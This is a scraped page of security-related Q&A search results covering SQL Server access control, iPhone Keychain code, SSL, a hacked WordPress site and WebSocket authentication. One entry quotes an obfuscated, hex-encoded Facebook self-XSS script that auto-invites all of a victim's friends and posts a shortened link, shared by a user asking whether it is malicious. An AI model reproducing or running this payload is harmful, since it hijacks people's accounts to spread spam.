Search Results

Search found 13810 results on 553 pages for 'security roles'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 167/553 | < Previous Page | 163 164 165 166 167 168 169 170 171 172 173 174  | Next Page >

  • SQL Server authentication - limit access to database to only connect through application

    - by Mauro
    I have a database which users should not be able to alter data in unless they use the specific app. I know best practice is to use windows authentication however that would mean that users could then connect to the database using any other data enabled app and change values which would then not be audited. Unfortunately SQL 2008 with its inbuilt auditing is not available. Any ideas how to ensure that users cannot change anything unless its through the controlling app?

    Read the article

  • Why does Keychain Services return the wrong keychain content?

    - by Graham Lee
    I've been trying to use persistent keychain references in an iPhone application. I found that if I created two different keychain items, I would get a different persistent reference each time (they look like 'genp.......1', 'genp.......2', …). However, attempts to look up the items by persistent reference always returned the content of the first item. Why should this be? I confirmed that my keychain-saving code was definitely creating new items in each case (rather than updating existing items), and was not getting any errors. And as I say, Keychain Services is giving a different persistent reference for each item. I've managed to solve my immediate problem by searching for keychain items by attribute rather than persistent references, but it would be easier to use persistent references so I'd appreciate solving this problem. Here's my code: - (NSString *)keychainItemWithName: (NSString *)name { NSString *path = [GLApplicationSupportFolder() stringByAppendingPathComponent: name]; NSData *persistentRef = [NSData dataWithContentsOfFile: path]; if (!persistentRef) { NSLog(@"no persistent reference for name: %@", name); return nil; } NSArray *refs = [NSArray arrayWithObject: persistentRef]; //get the data CFMutableDictionaryRef params = CFDictionaryCreateMutable(NULL, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); CFDictionaryAddValue(params, kSecMatchItemList, refs); CFDictionaryAddValue(params, kSecClass, kSecClassGenericPassword); CFDictionaryAddValue(params, kSecReturnData, kCFBooleanTrue); CFDataRef item = NULL; OSStatus result = SecItemCopyMatching(params, (CFTypeRef *)&item); CFRelease(params); if (result != errSecSuccess) { NSLog(@"error %d retrieving keychain reference for name: %@", result, name); return nil; } NSString *token = [[NSString alloc] initWithData: (NSData *)item encoding: NSUTF8StringEncoding]; CFRelease(item); return [token autorelease]; } - (void)setKeychainItem: (NSString *)newToken forName: (NSString *)name { NSData *tokenData = [newToken dataUsingEncoding: NSUTF8StringEncoding]; //firstly, find out whether the item already exists NSDictionary *searchAttributes = [NSDictionary dictionaryWithObjectsAndKeys: name, kSecAttrAccount, kCFBooleanTrue, kSecReturnAttributes, nil]; NSDictionary *foundAttrs = nil; OSStatus searchResult = SecItemCopyMatching((CFDictionaryRef)searchAttributes, (CFTypeRef *)&foundAttrs); if (noErr == searchResult) { NSMutableDictionary *toStore = [foundAttrs mutableCopy]; [toStore setObject: tokenData forKey: (id)kSecValueData]; OSStatus result = SecItemUpdate((CFDictionaryRef)foundAttrs, (CFDictionaryRef)toStore); if (result != errSecSuccess) { NSLog(@"error %d updating keychain", result); } [toStore release]; return; } //need to create the item. CFMutableDictionaryRef params = CFDictionaryCreateMutable(NULL, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); CFDictionaryAddValue(params, kSecClass, kSecClassGenericPassword); CFDictionaryAddValue(params, kSecAttrAccount, name); CFDictionaryAddValue(params, kSecReturnPersistentRef, kCFBooleanTrue); CFDictionaryAddValue(params, kSecValueData, tokenData); NSData *persistentRef = nil; OSStatus result = SecItemAdd(params, (CFTypeRef *)&persistentRef); CFRelease(params); if (result != errSecSuccess) { NSLog(@"error %d from keychain services", result); return; } NSString *path = [GLApplicationSupportFolder() stringByAppendingPathComponent: name]; [persistentRef writeToFile: path atomically: NO]; [persistentRef release]; }

    Read the article

  • Are there existing web sites that use a photo as a electronic signature?

    - by Alessandro Vernet
    The use case: to sign a electronic document, users view the document, and if they agree take a picture of themselves with their webcam (done through Flash from the browser). Then a PDF is generated containing the document and the picture in place of signature. This is a biometric signature, which is not as strong as a digital (cryptographic) signature, but stronger than having users draw their signature, as a photo is harder to forge than a drawn signature. Has anyone seen this technique being used on an existing web site?

    Read the article

  • Test wordpress sites for SQL Injection on siteurl

    - by Scott B
    I have a client who's wordpress sites have gotten hacked twice by iframe scammers. Each time they've injected iframe code into the content of the sites. This last time, today, they simply changed the siteurl in wp_options to their iframe code. The result was obvious and appeared to simply botch the paths of the scripts that rely on I can't determine if its a password compromise (on FTP or WordPress itself) or a SQL injection to alter siteurl. Since the only thing that was altered is siteurl, I'm thinking perhaps SQL Injection. What are your thoughts? Any way to scan a site for potential SQL injection vulnerabilities? The only active plugins on the site are contact form 7 and google xml sitemaps.

    Read the article

  • Framework for adding users/groups/permissions functionality to an application (possibly integrating

    - by vfilby
    I am looking to see if there is a good library or framework that I can use to simplify adding user/group/permission management to a .Net application (4.0 VS2010). If the framework can work on it's own or integrate with Active Directory that would be a huge bonus. So far I have found Visual Guard, if you have any experience using Visual Guard to provide user/group/permission functionality I definitely want to hear your feedback on how you liked working with it, pitfalls and benefits

    Read the article

  • How to prevent multiple registrations?

    - by GG.
    I develop a political survey website where anyone can vote once. Obviously I have to prevent multiple registrations for the survey remains relevant. Already I force every user to login with their Google, Facebook or Twitter account. But they can authenticate 3 times if they have an account on each, or authenticate with multiple accounts of the same platform (I have 3 accounts on Google). So I thought also store the IP address, but they can still go through a proxy... I thought also keep the HTTP User Agent with PHP's get_browser(), although they can still change browsers. I can extract the OS with a regex, to change OS is less easier than browsers. And there is also geolocation, for example with the Google Map API. So to summarize, several ideas: 1 / SSO Authentication (I keep the email) 2 / IP Address 3 / HTTP User Agent 4 / Geolocation with an API Have you any other ideas that I did not think? How to embed these tests? Execute in what order? Have you already deploy this kind of solution?

    Read the article

  • Storing credit card details

    - by Andrew
    I have a business requirement that forces me to store a customer's full credit card details (number, name, expiry date, CVV2) for a short period of time. Rationale: If a customer calls to order a product and their credit card is declined on the spot you are likely to lose the sale. If you take their details, thank them for the transaction and then find that the card is declined, you can phone them back and they are more likely to find another way of paying for the product. If the credit card is accepted you clear the details from the order. I cannot change this. The existing system stores the credit card details in clear text, and in the new system I am building to replace this I am clearly not going to replicate this! My question, then, is how I can securely store a credit card for a short period of time. I obviously want some kind of encryption, but what's the best way to do this? Environment: C#, WinForms, SQL-Server.

    Read the article

  • how to generate PMK?

    - by sebby_zml
    Hi everyone, I would like to know how can I generate a random pre-master key PMK in java? (related in key exchange and authentication) Is it similar with other randam key generating? What particularly is a pre master key? Thanks, Sebby.

    Read the article

  • How do you protect code from leaking outside?

    - by cubex
    Besides open-sourcing your project and legislation, are there ways to prevent, or at least minimize the damages of code leaking outside your company/group? We obviously can't block Internet access (to prevent emailing the code) because programmer's need their references. We also can't block peripheral devices (USB, Firewire, etc.) The code matters most when it has some proprietary algorithms and in-house developed knowledge (as opposed to regular routine code to draw GUIs, connect to databases, etc.), but some applications (like accounting software and CRMs) are just that: complex collections of routine code that are simple to develop in principle, but will take years to write from scratch. This is where leaked code will come in handy to competitors. As far as I see it, preventing leakage relies almost entirely on human process. What do you think? What precautions and measures are you taking? And has code leakage affected you before?

    Read the article

  • ASP.NET: disabling authentication for a single aspx page (custom error page)?

    - by Richard Collette
    I am using a custom error page: <customErrors redirectMode="ResponseRedirect" mode="On" defaultRedirect="Error2.aspx"/> I want to disable authentication for the custom error page because the error being raised is related to an authentication module and I don't want to get into an infinite loop and I want to display a clean error page to the user. I have been trying the following configuration to do that. <location path="Error2.aspx"> <system.web> <authentication mode="None"/> <authorization> <allow users="?"/> <allow users="*"/> </authorization> </system.web> </location> I am getting a System.Configuration.ConfigurationErrorsException for the line that sets the authentication mode. It is an error to use a section registered as allowDefinition='MachineToApplication' beyond application level. This error can be caused by a virtual directory not being configured as an application in IIS. I have verified that there are no other web.config files in subdirectories under the application's folder. The applications folder is configured as an application in IIS and the error page is at the application's root. File permissions set for the error page in IIS include anonymous and windows authentication (I have tried just anonymous as well).

    Read the article

  • Post login execution

    - by Javi
    Hello, I need to do some processing only after the user has successfully logged in the system. I have thought that I can do a RESTful method and setting it as the default-target-url so when the login is successful it goes to this url and then I can redirect to the real index of my web application. <form-login login-page='/login.htm' default-target-url='/home.htm' always-use-default-target='true' /> The problem is that this processing can be executed by calling its URL so it could be executed by any user at any time. I want to make sure it is only executed after login. Is there any way to do this? Thank you very much.

    Read the article

  • Securing against dynamic linking in .NET

    - by Henri
    I want to deploy an application with a license attached. However, I want to prevent that my dll can be easily referenced in visual studio. What are the usual ways of doing this? I was thinking about ngen-ing the application to prevent this, however, then the code becomes architecture dependent. Im not targetting any other architecture/platform besides windows, however, ngen-ing the application after making a release build seems like a workaround to me. Are there any other techniques to achieve this?

    Read the article

  • Invoke an action that is using ASP.NET MVC [Authorize] from outside the application

    - by Nate Bross
    Is this possible? I'd like to expose a URL (action) such as http://mysever/myapp/UpdateHeartbeat/. In my MVC application it looks like [Authorize] [AcceptsVerbs(HttpVerbs.Post)] public ActionResult UpdateHeartbeat() { // update date in DB to DateTime.Now } Now, in my MVC application the user has logged in via FORMS authentication and they can execute that action to their hearts content. What I want to do, is hit that URL progromatically (as part of an API that I wouldl like to build) -- is there a way I can do that without removing the [Authorize] attribute and adding username/password as parameters to the POST?

    Read the article

  • Kohana v3, automatically escape illegal characters?

    - by Dom
    Quick question, does Kohana (version 3) automatically escape data that is passed into ORM::factory..... (and everywhere else that has to do with the database)? For example: $thread = ORM::factory('thread', $this->request->param('id')); Would the data passed in the second argument be auto-escaped before it goes in the SQL query or do I have to manually do it? Probably a stupid question and it's better to be safe than sorry, but yeah... I usually do manually escape the data, but I want to know if Kohana does this for me? Thanks

    Read the article

  • extracting secrets from an embedded chip

    - by Will
    I am looking at an embedded system where secrets are stored in flash that is internal to the chip package, and there is no physical interface to get that information out - all access to this flash is policed by program code. All DMA attacks and JTAG and such are disabled. This seems to be a common locked-down configuration for system-on-a-chip. How might an attacker recover the secrets in that Flash? I understand they can fuzz for vulnerabilities in the app code and exploit it, that there could be some indistinct general side channel attack or something. But how would an attacker really go about trying to recover those keys? Are there viable approaches for a determined attacker to somehow shave-down the chip or some kind of microscope attack?

    Read the article

  • Javascript in the adress bar. is this malicious?

    - by David
    I got a message on facebook telling me to coppy paist this into my adress bar. I thought i'd post it here and see what everyone thinks about it. What does it do? how does it work? Here's the source code: // (DO NOT DO THIS!) Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"]; void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]); var c=document[a[6]](a[5]); c[a[8]](a[7],true,true); void (ss[a[9]](c)); void (setTimeout(function (){fs[a[10]]();} ,4000)); void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000)); void (setTimeout(function (){ document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E"; } ,5400));

    Read the article

  • Good articles to read on SSL and HTTPS?

    - by Igor Romanov
    I had a problem with accepting invalid SSL certificate in my iPhone program. That problem is solved now, however I came to understanding that I have very abstract idea on how exactly the whole thing is working: how web browser is verifying that received certificate is really for host it communicates to and not faked by same party in the middle? if browser talks to some 3rd party (CA?) to do certificate check? and many other questions... Would someone please recommend good source of information with in-depth enough description of how all parts click together?

    Read the article

  • iphone secure network identification

    - by CocoaNewBee
    Hello!!! can anyone tell me (code sample woudl be awesome) how to get the the secure wi-fi userid and password for the current logged user on the iphone for example: Wi-fi settings for a network using WPA2 Enterprise (network/username/password) how can I found out who's logged for said network ?? Thanks in advance!!! Cheers

    Read the article

  • WebSockets authentication

    - by Tomi
    What are the possible ways to authenticate user when websocket connection is used? Example scenario: Web based multi-user chat application through encrypted websocket connection. How can I ensure (or guarantee) that each connection in this application belongs to certain authenticated user and "can't be" exploited by false user impersonation during the connection.

    Read the article

  • What information should I log if I detect that my site is under attack?

    - by Abe Miessler
    In the code below if I get into the if statement I can safely say my site is under attack. What information is it a good idea to log? Any recommendations on actions that can be taken to minimize the damage at this point? protected void btn_Search_Click(object sender, EventArgs e) { if(tb_SearchBox.Text.Length > tb_SearchBox.MaxLength) { //What should i log? //What actions should I take? } //Otherwise search }

    Read the article

  • How to restrict access to my web service?

    - by Hank
    I have http://example.com/index.html, which from within the HTML uses JavaScript to call a web services at http://example.com/json/?a=...&b=... The web service returns to index.html a JSON array of information to then be displayed on index.html. Since anyone can view the source code for index.html and see how I'm calling the JSON web services (http://example.com/json/), how do I prevent people from calling my JSON web service directly? Since the web service is essentially an open read into my database, I don't want people to abuse the web service and start DoS my server, fetching more information than they should, etc..

    Read the article

  • Create x509 certificate with openssl/makecert tool

    - by Zé Carlos
    I'm creating a x509 certificate using makecert with the following parameters: makecert -r -pe -n "CN=Client" -ss MyApp I want to use this certificate to encrypt and decrypt data with RSA algoritm. I look to generated certificate in windows certificate store and everything seems ok (It has a private key, public key is a RSA key with 1024 bits and so on..) Now i use this C# code to encrypt data: X509Store store = new X509Store("MyApp", StoreLocation.CurrentUser); store.Open(OpenFlags.ReadOnly); X509Certificate2Collection certs = store.Certificates.Find(X509FindType.FindBySubjectName, "Client", false); X509Certificate2 _x509 = certs[0]; using (RSACryptoServiceProvider rsa = (RSACryptoServiceProvider)_x509.PrivateKey) { byte[] dataToEncrypt = Encoding.UTF8.GetBytes("hello"); _encryptedData = rsa.Encrypt(dataToEncrypt, true); } When executing the Encrypt method, i receive a CryptographicException with message "Bad key". I think the code is fine. Probably i'm not creating the certificate properly. Any comments? Thanks ---------------- EDIT -------------- If anyone know how to create the certificate using OpenSsl, its also a valid answer for me.

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 163 164 165 166 167 168 169 170 171 172 173 174  | Next Page >